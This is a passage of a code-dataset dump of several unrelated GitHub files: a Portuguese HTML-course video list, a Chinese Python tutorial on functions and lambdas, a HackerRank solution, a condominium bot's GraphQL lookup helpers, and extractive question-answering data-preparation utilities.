\"https://www.youtube.com/watch?v=8TgKFYkcO5Y&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=23\"\n }],\n \"sugg_prevs\": [74],\n \"sugg_nexts\": []\n }, # 75\n {\n \"name\": \"Citações e Códigos - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Citações e Códigos - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=4ynvsrkamt8&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=24\"\n }],\n \"sugg_prevs\": [75],\n \"sugg_nexts\": []\n }, # 76\n {\n \"name\": \"Lista OL e UL - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Lista OL e UL - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=JlE0pzESf5g&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=25\"\n }],\n \"sugg_prevs\": [76],\n \"sugg_nexts\": []\n }, # 77\n {\n \"name\": \"Listas mistas e de definição - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Listas mistas e de definição - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=Ez1kgIyoGuE&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=26\"\n }],\n \"sugg_prevs\": [77],\n \"sugg_nexts\": []\n }, # 78\n {\n \"name\": \"Links e Âncoras em HTML5 - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Links e Âncoras em HTML5 - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=LeOVXQDsAIY&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=27\"\n }],\n \"sugg_prevs\": [78],\n \"sugg_nexts\": []\n }, # 79\n {\n \"name\": \"Links internos - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Links internos - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=LeLnlT-ZKw8&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=28\"\n }],\n \"sugg_prevs\": [79],\n \"sugg_nexts\": []\n }, # 80\n {\n \"name\": \"Links para download - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Links para download - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=Jszz7M676y8&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=29\"\n }],\n \"sugg_prevs\": [80],\n \"sugg_nexts\": []\n }, # 81\n {\n \"name\": \"Desafios propostos - HTML\",\n \"badge\": None,\n \"type\": 1,\n \"urls\": [{\n \"name\": \"Desafios propostos - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=suL56Mdx22Y&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=30\"\n }],\n \"sugg_prevs\": [81],\n \"sugg_nexts\": []\n }, # 82\n {\n \"name\": \"Imagens dinâmicas - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Imagens dinâmicas - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=E01LDVj0Rpg&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=31\"\n }],\n \"sugg_prevs\": [82],\n \"sugg_nexts\": []\n }, # 83\n {\n \"name\": \"Imagens que se adaptam sozinhas - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Imagens que se adaptam sozinhas - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=cAgkwPWE4hU&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=32\"\n }],\n \"sugg_prevs\": [83],\n \"sugg_nexts\": []\n }, # 84\n {\n \"name\": \"Adicionando áudio ao site - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Adicionando áudio ao site - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=4OZYsFl-J9s&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=33\"\n }],\n \"sugg_prevs\": [84],\n \"sugg_nexts\": []\n }, # 85\n {\n \"name\": \"Formatos de vídeo para seu site - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Formatos de vídeo para seu site - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=DjOSM72cYac&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=34\"\n }],\n \"sugg_prevs\": [85],\n \"sugg_nexts\": []\n }, # 86\n {\n \"name\": \"Vídeos em hospedagem própria - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Vídeos em hospedagem própria - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=TCeyIwFGkYo&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=35\"\n }],\n \"sugg_prevs\": [86],\n \"sugg_nexts\": []\n }, # 87\n {\n \"name\": \"Incorporação de vídeos externos - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Incorporação de vídeos externos - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=3hng-hmSv2Y&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=36\"\n }],\n \"sugg_prevs\": [87],\n \"sugg_nexts\": []\n }, # 88\n {\n \"name\": \"Criar um site em vídeo - HTML\",\n \"badge\": \"HTML\",\n \"type\": 1, # 0: Subject, 1: Exercise (Exercises não aparecem na busca, diferentememnte de Subjects ou Badges)\n \"urls\": [{\n \"name\": \"Criar um site em vídeo - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=gqrySQQzvvQ&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=37\"\n }],\n \"sugg_prevs\": [88],\n \"sugg_nexts\": []\n }, # 89\n]\n\nfrom utils.upload_caminhos import create_subject_from_file\ncreate_subject_from_file(html)\n","repo_name":"rubensgaguiar/caminhos-api","sub_path":"subjects/011_caminhos.py","file_name":"011_caminhos.py","file_ext":"py","file_size_in_byte":10849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"2798004489","text":"# # 石头剪刀布游戏\n# import random\n# c = ['石头', '剪刀', '布']\n# while True:\n# a = input('请出拳0-拳 1-刀 2-布,或者退出游戏(q):')\n# if a in ['0', '1', '2']:\n# a = int(a)\n# b = random.randint(0, 2)\n# if (a == 0 and b == 1) or (a == 1 and b == 2) or (a == 2 or b == 1):\n# print(f'玩家出{c[a]},电脑出{c[b]},玩家胜')\n# elif a == b:\n# print(f'玩家出{c[a]},电脑出{c[b]},平局了')\n# else:\n# print(f'玩家出{c[a]},电脑出{c[b]},电脑胜')\n# elif a in ['q', 'Q']:\n# d = input('确定要退出游戏么(y/n):')\n# if d == 'y' or d == 'Y':\n# print()\n# break\n# else:\n# print('您输入错误,请重新输入')\n\n\n# 九九乘法表\n# 用父循环把九行打出来 while循环\na = 1\nwhile a <= 9:\n # print(f'我是第{a}行')\n # todo 完善每一行的内容\n col = 1\n while col <= a:\n print(f'{col}*{a}={col*a}', end='\\t')\n col += 1\n print()\n a += 1\n# 用for循环\nfor a in range(1, 10):\n for col in range(1, a+1):\n print(f'{col}*{a}={col*a}', end='\\t')\n print()\n\n# 退出循环的方式\n# while..else\n# while..break..else\n# while..continue..else\n# for..else\n# for..break..else\n# for..continue..else\n\n# 函数\n# 定义函数>调用函数\n# def 函数(参数) > 函数(参数)\n\n\ndef s1(b, c):\n d = b + c\n print(d)\n\n\ns1(3, 4) # 7\n\n\ndef s2():\n \"\"\"\n 三个单引号或双引号之间是对函数的解读\n :return:\n \"\"\"\n return 404 # return也代表了函数的终止,函数内return后面的代码不会被执行\n print('这个函数结束了')\n\n\nn = s2() # n代表函数s2的返回值,如果n值等于None,证明这个函数没有返回值\nprint(n) # 404\nprint(s1(3, 4)) # 7 None(因为没有返回值,先会打印函数的结果,然后返回值为None)\n\n\ndef print_one_line():\n print('-'*10)\n\n\nprint_one_line() # ----------\n\n\ndef print_lines(n):\n i = 1\n while i <= n:\n print_one_line()\n i += 1\n\n\nprint_lines(5)\n\n\n# 函数题内部修改全局变量的值,通过global去声明该变量,并且执行该函数\na = 3\n\n\ndef s3():\n global a\n a = 5\n print(a)\n\n\ns3()\nprint(a)\n\n# 函数的参数\n# 1.位置参数\ndef user_info(name, age, gender):\n print(f'您的姓名是{name},年龄是{age},性别是{gender}')\n\n\nuser_info('tortoise', 25, '男') # 您的姓名是tortoise,年龄是25,性别是男\n# 2.关键字参数 函数调用,通过'键=值'形式加以指定\ndef user_info(name, age, gender):\n print(f'您的姓名是{name},年龄是{age},性别是{gender}')\n\n\nuser_info(gender='女', age=17, name='zouzou') # 您的姓名是zouzou,年龄是17,性别是女\n# 函数调用时,如果有位置参数,位置参数必须在关键字参数的前面,但关键字参数之间不存在先后顺序\n# 3.缺省参数 也叫默认参数,用于定义函数,为函数中的参数提供默认值,调用时可不传该参数的值(在函数定义和调用时,所有位置参数必须出现在默认参数前)\ndef user_info(name, age, gender='女'):\n print(f'您的姓名是{name},年龄是{age},性别是{gender}')\n\n\n# 调用函数,使用默认参数,不传gender\nuser_info('zouzou', 18) # 您的姓名是zouzou,年龄是18,性别是女\n# 调用函数,修改默认参数的值,关键字参数不区分顺序,只要在位置参数的后面就可以\nuser_info('tom', gender='男', age=20) # 您的姓名是tom,年龄是20,性别是男\n# 4.不定长参数:可变参数,用于不确定调用的时候会传递多少个参数(不传也可以),可用包裹位置参数或关键词参数来进行参数传递,会非常方便\n# a.包裹位置参数传递 *args 对元组进行解包 * ���包\ndef user_info(*args):\n print(args)\n\n\n# 定义函数时有*args 调用函数用位置参数\nuser_info('Tom') # ('Tom',)\nuser_info() # ()\nuser_info('Tom', 90) # ('Tom', 90)\n# b.包裹关键词参数传递 **kwargs 字典形式的 ** 解包 kwargs\ndef user_info(**kwargs):\n print(kwargs)\n\n\n# 定义函数有**kwargs 调用函数用关键词参数\nuser_info(name='Tom', age=25, gender='男') # {'name': 'Tom', 'age': 25, 'gender': '男'}\n\n# 拆包\n# 元组拆包 对应参数\n# 字典拆包 对应key\n\n# 可变和不可变的数据类型(数据能否直接修改)\n# 可变 列表 字典 集合\n# 不可变 整数 字符串 元组\n\ndef extendList(val, list=[]):\n list.append(val)\n return list\n\n\nlist1 = extendList(10) # [10]\nprint(\"list1=%s\"%list1) # [10]\nlist2 = extendList(123, []) # [123] ==> list2 = extendList(123, list=[])重新定义了后面的参数值\nlist3 = extendList('a') # [10, 'a']\nprint(\"list1=%s\"%list1) # [10, 'a']\nprint(\"list2=%s\"%list2) # [123]\nprint(\"list3=%s\"%list3) # [10, 'a']\n\n# lambda语法 =匿名函数 如果一个函数只有一个返回值,并且只有一句代码,可以使用lambda进行简化\n# lambda 参数:表达式\n# lambda表达式的参数可有可无,函数的参数在lambda中完全适用\n# lambda函数能接收任意数量的参数,但只能返回一个表达式的值\n# 支持无参数,一个参数,默认参数,可变参数*args,可变参数**kwargs\nprint((lambda a, b: a + b)(10, 20)) # 30\nfn = lambda a, b, c=100: a+b+c\nprint(fn(40, 20)) # 160\nprint((lambda a, b: True if a > b else False)(100, 150)) # False\n\nstudents = [\n {'name': 'TOM', 'age': 20},\n {'name': 'ROSE', 'age': 19},\n {'name': 'jack', 'age': 24}\n]\n# 列表序列.sort(key=None,reverse=False) 默认是升序\nstudents.sort(key=lambda x:x['name'])\nprint(students) # [{'name': 'ROSE', 'age': 19}, {'name': 'TOM', 'age': 20}, {'name': 'jack', 'age': 24}]\nstudents.sort(key=lambda x:x['name'], reverse=True)\nprint(students) # [{'name': 'jack', 'age': 24}, {'name': 'TOM', 'age': 20}, {'name': 'ROSE', 'age': 19}]\nstudents.sort(key=lambda x:x['age'])\nprint(students) # [{'name': 'ROSE', 'age': 19}, {'name': 'TOM', 'age': 20}, {'name': 'jack', 'age': 24}]\n\n# 高阶函数\n# 需求:一个函数完成两个任意数字的绝对值只和 abs()绝对值\ndef add_num(a, b):\n return abs(a) + abs(b)\nprint(add_num(1,-4)) # 5\n\ndef add_nums(a, b, f):\n return f(a) + f(b)\nprint(add_nums(-3, 5, abs)) # 8\n# 函数式编程大量使用函数,减少了代码的重复,因此程序比较短,开发速度快\n\n# 内置高阶函数\n# 1.map()会根据指定的函数对指定序列做映射\n# 第一个参数function()以参数序列的每一个元素调用function函数,返回包含每次function函数返回值的新列表。如果要转换为列表,可以使用list()来转换\n# 语法: map(function, iterable,....)\n# 参数: function:函数 iterable:一个或多个序列\n# 返回值: python3返回的是迭代器\nlist1 = [7, 10, 13, 2]\nresult = map(lambda x: x*2, list1)\nprint(result) # \nlist2 = list(result)\nprint(list2) # [14, 20, 26, 4]\n\n# 2.reduce()\n# reduce(func(x, y), list)函数会对参数序列中元素进行积累。其中func必须有两个参数,每次func计算的结果继续和序列的下个元素做继续计算\n# a.reduce()传入的参数func必须接收2个参数\n# b.reduce是要从functions里面去导包的\n# 需求:计算list1序列中各个数字的累加和\nfrom functools import reduce\nlist1 = [3, 5, 6, 4, 7]\nresult = reduce(lambda x, y: x+y, list1)\nprint(result) # 25\n\n# 3.filter()\n# filter(func, list)函数用于过滤序列,过滤掉不符合条件的元素,返回一个filter对象。如果要转换为列表,可以使用list()来转换\n# 需求:筛选出列表里面的偶数项\nlist2 = [1, 2, 2, 3, 4, 7, 14, 6]\nprint(list(filter(lambda x: x % 2 == 0, list2))) # [2, 2, 4, 14, 6]\ndef func(x):\n return x % 2 == 0\nresult = filter(func, list2)\nprint(result) # \nprint(list(result)) # [2, 2, 4, 14, 6]\n\n\n","repo_name":"Toetoise/python_test","sub_path":"lesson3.py","file_name":"lesson3.py","file_ext":"py","file_size_in_byte":8009,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"5548499809","text":"def average(array):\n distinct = set(array)\n total = 0\n for item in distinct:\n total += item\n avg = total / len(distinct)\n return avg\n\n\nif __name__ == '__main__':\n n = int(input())\n arr = list(map(int, input().split()))\n result = average(arr)\n print(result)\n","repo_name":"rifatrakib/hackerrank","sub_path":"Python/Sets.py","file_name":"Sets.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"8664657671","text":"\"\"\"\nCheck information about condominium\n\"\"\"\n\nimport logging\nimport os\nimport requests\n\nfrom settings import PATH, LOG_NAME, API_TOKEN\n\nlogger = logging.getLogger(LOG_NAME)\n\nclass CheckCondo:\n \"\"\"\n Check information about blocks and apartments\n \"\"\"\n\n def block(block):\n \"\"\"\n Check block information\n \"\"\"\n\n logger.debug(\"Checking if the informed block exists in database\")\n query = \"\"\"\n query block($number: String!){\n block(number: $number){\n number\n }\n }\n \"\"\"\n\n variables = {\n 'number': block\n }\n\n headers = {\n 'Authorization': 'JWT %s' % API_TOKEN\n }\n\n response = requests.post(\n PATH,\n headers=headers,\n json={'query': query, 'variables':variables}\n )\n logger.debug(f\"Response: {response.json()}\")\n\n return response.json()\n\n def apartment(block, apartment):\n \"\"\"\n Check apartment information\n \"\"\"\n logger.debug(\"Checking if the informed apartment exists in database\")\n query = \"\"\"\n query apartment($number: String!, $block: String!){\n apartment(number: $number, block: $block){\n number\n block{\n number\n }\n }\n }\n \"\"\"\n\n variables = {\n 'number': apartment,\n 'block': block\n }\n\n headers = {\n 'Authorization': 'JWT %s' % API_TOKEN\n }\n\n response = requests.post(\n PATH,\n headers=headers,\n json={'query': query, 'variables':variables}\n )\n logger.debug(f\"Response: {response.json()}\")\n\n return response.json()\n\nclass CheckResident:\n \"\"\"\n Check resident information\n \"\"\"\n\n def email(email):\n \"\"\"\n Check email information\n \"\"\"\n\n logger.debug(\"Checking if the informed email exists in database\")\n query = \"\"\"\n query resident($email: String!){\n resident(email: $email){\n completeName\n }\n }\n \"\"\"\n\n variables = {\n 'email': email\n }\n\n headers = {\n 'Authorization': 'JWT %s' % API_TOKEN\n }\n\n response = requests.post(\n PATH,\n headers=headers,\n json={'query': query, 'variables':variables}\n )\n logger.debug(f\"Response: {response.json()}\")\n\n return response.json()\n\n def cpf(cpf):\n \"\"\"\n Check cpf information\n \"\"\"\n\n logger.debug(\"Checking if the informed CPF exists in database\")\n query = \"\"\"\n query resident($cpf: String!){\n resident(cpf: $cpf){\n completeName\n\n }\n }\n \"\"\"\n\n variables = {\n 'cpf': cpf\n }\n\n headers = {\n 'Authorization': 'JWT %s' % API_TOKEN\n }\n\n response = requests.post(\n PATH,\n headers=headers,\n json={'query': query, 'variables':variables}\n )\n logger.debug(f\"Response: {response.json()}\")\n\n return response.json()\n\n\nclass CheckVisitor:\n \"\"\"\n check visitor data\n \"\"\"\n\n def cpf(cpf):\n \"\"\"\n Check if cpf is valid\n \"\"\"\n\n logger.debug(\"Checking if the informed CPF of visitor exists in database\")\n query = \"\"\"\n query visitor($cpf: String!){\n visitor(cpf: $cpf){\n completeName\n }\n }\n \"\"\"\n\n variables = {\n 'cpf': cpf\n }\n\n headers = {\n 'Authorization': 'JWT %s' % API_TOKEN\n }\n\n response = requests.post(\n PATH,\n headers=headers,\n json={'query': query, 'variables':variables}\n )\n logger.debug(f\"Response: {response.json()}\")\n\n return response.json()\n\nclass CheckAdmin:\n \"\"\"\n Check admin information\n \"\"\"\n\n def email(email):\n \"\"\"\n Check if admin email exists in database\n \"\"\"\n\n logger.debug(\"Checking if the informed email exists in database\")\n query = \"\"\"\n query admin($adminEmail: String!){\n admin(adminEmail: $adminEmail){\n admin {\n email\n }\n }\n }\n \"\"\"\n\n variables = {\n 'adminEmail': email\n }\n\n headers = {\n 'Authorization': 'JWT %s' % API_TOKEN\n }\n\n response = requests.post(\n PATH,\n headers=headers,\n json={'query': query, 'variables':variables}\n )\n logger.debug(f\"Response: {response.json()}\")\n\n return response.json()\n","repo_name":"Alohomora-team/2019.2-AlohomoraBot","sub_path":"bot/checks.py","file_name":"checks.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"23226536987","text":"import logging\nimport os\nimport importlib.util\nfrom itertools import islice\nfrom subprocess import call\nimport json\nfrom itertools import groupby\nfrom collections import defaultdict\n\nimport numpy as np\nimport spacy\nimport nltk\nfrom spacy.lang.en import English\nfrom nltk.parse.corenlp import CoreNLPParser\nfrom tqdm import tqdm\n\nimport evaluate\n\nlogging.basicConfig(level=logging.INFO)\n\nBASEDIR = os.path.join(os.path.dirname(__file__), '.')\n\nnlp = spacy.load('en')\nspacy_tokenizer = English().Defaults.create_tokenizer(nlp)\nstanford_tokenizer = CoreNLPParser()\n\n\ndef index_by_starting_character(text, tokens):\n \"\"\"\n Given a string of text and a list of its tokens produce a dict where the keys are the character start\n positions of the tokens and the values are [token, index] where index denotes the position of the token\n in the text.\n \"\"\"\n seen = ''\n current_token_id = 0\n token_map = dict()\n for char_id, char in enumerate(text):\n if char != u' ':\n seen += char\n context_token = tokens[current_token_id]\n if seen == context_token:\n syn_start = char_id - len(seen) + 1\n token_map[syn_start] = [seen, current_token_id]\n seen = ''\n current_token_id += 1\n return token_map\n\n\ndef tokenize(text, tokenizer):\n \"\"\"\n Tokenize text into a list of tokens using one of the following tokenizers:\n - nltk\n - spacy\n - stanford\n \"\"\"\n if tokenizer == 'nltk':\n tokens = ['\"' if token in {'``', '\\'\\''} else token for token in nltk.word_tokenize(text)]\n elif tokenizer == 'spacy':\n tokens = [word.text for word in spacy_tokenizer(text)]\n elif tokenizer == 'stanford':\n tokens = list(stanford_tokenizer.tokenize(text))\n else:\n raise ValueError('tokenizer param must be one of the following: nltk|spacy|stanford')\n return tokens\n\n\ndef fix_double_quotes(text):\n \"\"\"\n Given some text standardize all its double quotes by replacing them with the standard double quote symbol.\n \"\"\"\n ans = text.replace(\"''\", '\" ')\n ans = ans.replace(\"``\", '\" ')\n return ans\n\n\ndef fix_whitespace(text):\n \"\"\"\n Remove all non-single spaces from text.\n \"\"\"\n return ' '.join([x for x in [x.strip() for x in text.split(' ')] if x != ''])\n\n\ndef make_squad_examples(data,\n tokenizer,\n word2id,\n name=None,\n max_context_len=300,\n max_answer_len=10,\n max_question_len=20,\n ):\n \"\"\"\n Given a SQuAD dataset, builds a list of example dicts (see implementation).\n \"\"\"\n examples = []\n total = 0\n total_passed = 0\n skipped = defaultdict(lambda: 0)\n span2position = make_span2position(\n seq_size=max_context_len,\n max_len=max_answer_len\n )\n position2span = {v: k for k, v in span2position.items()}\n\n for line in tqdm(data['data'], desc=name):\n title = line['title']\n\n for paragraph in line['paragraphs']:\n # Extract context\n context = paragraph['context']\n context = fix_double_quotes(context)\n context_tokens = tokenize(context, tokenizer=tokenizer)\n\n if max_context_len and len(context_tokens) > max_context_len:\n skipped['context too long'] += len(paragraph['qas'])\n total += len(paragraph['qas'])\n continue\n\n answer_map = index_by_starting_character(context, context_tokens)\n\n for qa in paragraph['qas']:\n # Extract question\n question = qa['question']\n question = fix_double_quotes(question)\n question_tokens = tokenize(question, tokenizer=tokenizer)\n\n # Extract answer\n answer = qa['answers'][0]['text']\n answer = fix_double_quotes(answer)\n answer_tokens = tokenize(answer, tokenizer=tokenizer)\n\n if max_answer_len and len(answer_tokens) > max_answer_len:\n skipped['answer too long'] += 1\n total += 1\n continue\n\n answer_start = qa['answers'][0]['answer_start']\n answer_end = answer_start + len(answer)\n\n # Find answer span\n try:\n last_word_answer = len(answer_tokens[-1]) # add one to get the first char\n\n _, span_start = answer_map[answer_start] # start token index\n _, span_end = answer_map[answer_end - last_word_answer]\n\n extracted_answer = context_tokens[span_start:span_end + 1]\n extracted_answer = ' '.join(extracted_answer)\n extracted_answer = evaluate.normalize_answer(extracted_answer)\n\n actual_clean = evaluate.normalize_answer(answer)\n\n assert extracted_answer == actual_clean, f'{extracted_answer} != {actual_clean}'\n\n span_positions = [span2position[(span_start, span_end)]]\n\n s, e = position2span[span_positions[0]]\n assert ' '.join(context_tokens[s:e+1]) == ' '.join(answer_tokens), \\\n 'Extracted span does not match answer'\n\n correct_spans = np.asarray(list({\n k: v for\n k, v in\n span2position.items()\n if np.all(np.asarray(k) < len(context_tokens))\n }.values()))\n span_mask = np.zeros(len(span2position))\n span_mask[correct_spans] = 1\n\n example = {\n 'title': title,\n 'context_raw': context_tokens,\n 'question_raw': question_tokens,\n 'answer_raw': answer_tokens,\n 'context': pad_seq([word2id[w] for w in context_tokens], maxlen=max_context_len),\n 'question': pad_seq([word2id[w] for w in question_tokens], maxlen=max_question_len),\n 'answer': pad_seq([word2id[w] for w in answer_tokens], maxlen=max_answer_len),\n 'context_len': len_or_maxlen(context_tokens, max_context_len),\n 'question_len': len_or_maxlen(question_tokens, max_question_len),\n 'answer_len': len_or_maxlen(answer_tokens, max_answer_len),\n 'starts': [span_start],\n 'ends': [span_end],\n 'span_positions': span_positions,\n 'span_mask': span_mask,\n 'label': np.asarray([1 if x in span_positions else 0 for x in span2position.values()])\n }\n\n total_passed += 1\n total += 1\n \n examples.append(example)\n\n except (AssertionError, KeyError) as e:\n skipped['error finding span'] += 1\n total += 1\n continue\n\n examples.append(example)\n\n total_skipped = sum(skipped.values())\n ratio_skipped = total_skipped/total if total != 0 else 0\n logging.info(f'max_context_len: {max_context_len}')\n logging.info(f'max_answer_len: {max_answer_len}')\n logging.info(f'skipped {skipped}/{total}\\t({ratio_skipped})')\n print(json.dumps(skipped, indent=4))\n print(f'ratio skipped: {ratio_skipped}')\n print(f'{total_passed} examples PASSED')\n return examples\n\n\ndef len_or_maxlen(seq, maxlen):\n return len(seq) if len(seq) <= maxlen else maxlen\n\n\ndef make_conll_examples(\n data,\n questions,\n word2id,\n name=None,\n max_context_len=300,\n max_answer_len=10,\n max_question_len=20\n):\n \"\"\"\n Given a CoNLL dataset, builds a list of example dicts (see implementation).\n \"\"\"\n\n span2position = make_span2position(\n seq_size=max_context_len,\n max_len=max_answer_len\n )\n\n examples = []\n\n for i, line in tqdm(enumerate(data), desc=name):\n context_tokens = [x[0] for x in line]\n labels = [x[1] for x in line]\n\n for label, question in questions[i].items():\n if max_context_len and len(context_tokens) > max_context_len:\n # context_tokens = context_tokens[:max_context_len]\n continue\n question_tokens = question.split()\n indicators = [1 if x == label else 0 for x in labels]\n\n span_starts = []\n span_ends = []\n\n for k, g in groupby(enumerate(indicators), lambda ix: ix[1]):\n if k == 1:\n res = list(g)\n if max_answer_len and len(res) > max_answer_len:\n continue\n span_starts.append(res[0][0])\n span_ends.append(res[-1][0])\n\n span_positions = [span2position[(s, e)] for s, e in zip(span_starts, span_ends)]\n\n answer_tokens = [token for s, e in zip(span_starts, span_ends) for token in context_tokens[s:e+1]]\n\n example = {\n 'title': '',\n 'context_raw': context_tokens,\n 'question_raw': question_tokens,\n 'answer_raw': answer_tokens,\n 'context': pad_seq([word2id[w] for w in context_tokens], maxlen=max_context_len),\n 'question': pad_seq([word2id[w] for w in question_tokens], maxlen=max_question_len),\n 'answer': pad_seq([word2id[w] for answer in answer_tokens for w in answer], maxlen=max_answer_len),\n 'context_len': len_or_maxlen(context_tokens, max_context_len),\n 'question_len': len_or_maxlen(question_tokens, max_question_len),\n 'answer_len': len_or_maxlen(answer_tokens, max_answer_len),\n 'starts': span_starts,\n 'ends': span_ends,\n 'span_positions': span_positions,\n 'label': np.asarray([1 if x in span_positions else 0 for x in span2position.values()])\n }\n\n examples.append(example)\n return examples\n\n\ndef make_spans(seq, max_len=10):\n \"\"\"\n Given a sequence creates a list of spans up to and including size max_len where every span is an indexed windows\n (start_idx, end_idx, [items]). See make_indexed_windows for more information.\n \"\"\"\n spans = []\n for span_len in range(1, max_len+1):\n spans.extend(list(make_indexed_windows(seq, n=span_len)))\n # now sort the spans by start position + end position (if start is the same)\n return sorted(spans, key=lambda x: (x[0], x[1]))\n\n\ndef make_indexed_windows(seq, n=2):\n \"\"\"\n Return a sliding window of n items from a sequence of items. Every window is a tuple (star_idx, end_idx, [items])\n where start_idx and end_idx are the start and end item indexes of the window items and [items] are the items\n themselves.\n \"\"\"\n it = iter(enumerate(seq))\n result = tuple(islice(it, n))\n if len(result) == n:\n yield (result[0][0], result[-1][0], [x[1] for x in result])\n for elem in it:\n result = result[1:] + (elem,)\n yield (result[0][0], result[-1][0], [x[1] for x in result])\n\n\ndef make_span2position(seq_size, max_len):\n \"\"\"\n Create a dictionary (start_idx, end_idx) -> span position.\n \"\"\"\n seq = [0] * seq_size # getting a bit hacky here...\n spans = make_spans(seq, max_len)\n span2position = {}\n for i, span in enumerate(spans):\n span2position[(span[0], span[1])] = i\n return span2position\n\n\ndef glove_embeddings(embedding_size, emb_path=None, script_path=None):\n \"\"\"\n Prepare a word2vec dictionary {word -> vector} where the pre-trained vector embeddings are GloVe embeddings.\n If the user does not have glove vectors in the project's /data directory then download them into it.\n \"\"\"\n emb_path = emb_path if emb_path else '{}/data/glove/glove.6B.{}d.txt'.format(BASEDIR, embedding_size)\n\n try:\n f = open(emb_path, 'r')\n except IOError:\n call(script_path if script_path else '{}/download_glove.sh'.format(BASEDIR), shell=True)\n f = open(emb_path, 'r')\n\n rows = f.read().split('\\n')[:-1]\n\n def _parse_embedding_row(embedding_row):\n word, string_embedding = embedding_row.split(' ', 1)\n return word, np.fromstring(string_embedding, sep=' ')\n\n return dict([_parse_embedding_row(row) for row in tqdm(rows, desc='Parsing glove file.')])\n\n\ndef make_glove_embedding_matrix(word2id, word2vec, unk=0, pad=1, unk_state=np.zeros):\n \"\"\"\n Takes (1) a word2id dictionary and (2) a word2vec dictionary and creates a numpy embedding matrix\n |vocab size| x |embedding size| with matched id -> vector matrix rows. The reason why we need this function\n is because we tend to build the word2id dict ourselves from tokenized text data whereas word2vec usually\n comes from some outside source.\n\n IMPORTANT:\n - assumes word2id reserves values for pad and unknown words\n - by default words in (1) but not in (2) are set to unk_state (e.g. np.zeros or np.random.rand)\n - embeddings of words not found in word2id are THROWN AWAY in this function (a workaround it to make sure they're\n included in word2id)\n \"\"\"\n embedding_size = len(next(iter(word2vec.values()))) # get first value from dict to find\n\n embedding_matrix = np.zeros((len(word2id) + 2, embedding_size)) # +2 for unk & pad\n zero_vec = np.zeros(embedding_size)\n embedding_matrix[pad] = zero_vec # pad\n embedding_matrix[unk] = zero_vec # unk\n\n for word, id in word2id.items():\n if word in word2vec:\n vec = word2vec[word]\n elif word.lower() in word2vec:\n vec = word2vec[word.lower()]\n else:\n vec = unk_state(embedding_size)\n\n assert embedding_size == len(vec)\n embedding_matrix[id] = vec\n\n return embedding_matrix\n\n\ndef vectorize_tokens(tokens, word2vec):\n \"\"\"\n Given a sequence of tokens, vectorize them using a word2vec dict.\n \"\"\"\n embedding_size = len(next(iter(word2vec.values()))) # get first value from dict to find\n\n token_vectors = []\n for token in tokens:\n if token in word2vec:\n token_vectors.append(word2vec[token])\n else:\n if token.lower() in word2vec:\n token_vectors.append(word2vec[token.lower()])\n else:\n token_vectors.append(np.zeros(embedding_size))\n return np.asarray(token_vectors)\n\n\ndef import_module(path):\n \"\"\"\n Primarily used for importing config files.\n \"\"\"\n spec = importlib.util.spec_from_file_location('', path)\n m = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(m)\n return m\n\n\ndef pad_seq(seq, maxlen, reverse=False):\n \"\"\" Pad or shorten list of items to a specified maxlen \"\"\"\n res = seq\n if len(seq) > maxlen:\n if reverse:\n del res[:(len(seq) - maxlen)]\n else:\n del res[maxlen:]\n elif len(seq) < maxlen:\n if reverse:\n res = [0] * (maxlen - len(seq)) + res\n else:\n res.extend([0] * (maxlen - len(seq)))\n return res\n","repo_name":"andrejzg/extractive-qa","sub_path":"data_ops.py","file_name":"data_ops.py","file_ext":"py","file_size_in_byte":15585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"38312514285","text":"import sys\nsys.path.append('../..')\nimport os\nfrom 